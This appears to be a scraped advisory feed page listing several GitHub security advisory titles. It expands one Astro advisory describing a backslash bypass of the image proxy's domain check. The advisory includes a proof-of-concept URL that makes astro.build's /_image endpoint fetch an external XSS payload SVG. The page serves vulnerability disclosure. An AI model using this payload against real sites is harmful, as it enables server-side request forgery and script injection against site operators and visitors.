GHSA-7f5h-v6xp-fcq8: Starlette vulnerable to O(n^2) DoS via Range header merging in ``starlette.responses.FileResponse``

GHSA-867c-p784-5q6g: PrivateBin is missing HTML sanitization of attached filename in file size hint

GHSA-f5p4-p5q5-jv3h: Contrast has insecure LUKS2 persistent storage partitions may be opened and used

GHSA-7whh-79j3-7c55: InventoryGui allows item duplication in GUIs which use GuiStorageElement

GHSA-qcpr-679q-rhm2: Astro's bypass of image proxy domain validation leads to SSRF and potential XSS

### Summary

This is a patch bypass of CVE-2025-58179 in commit [9ecf359](https://github.com/withastro/astro/commit/9ecf3598e2b29dd74614328fde3047ea90e67252). The fix blocks `http://`, `https://` and `//`, but can be bypassed using backslashes (`\`) - the endpoint still issues a server-side fetch.

### PoC
[https://astro.build/_image?href=\\raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg&f=svg](https://astro.build/_image?href=%5C%5Craw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg&f=svg)

**Astro's bypass of image proxy domain validation leads to SSRF and potential XSS**

High severity GitHub Reviewed Published Oct 28, 2025 in withastro/astro • Updated Oct 28, 2025

Headline

GHSA-qcpr-679q-rhm2: Astro's bypass of image proxy domain validation leads to SSRF and potential XSS

Summary

PoC

ghsa: Latest News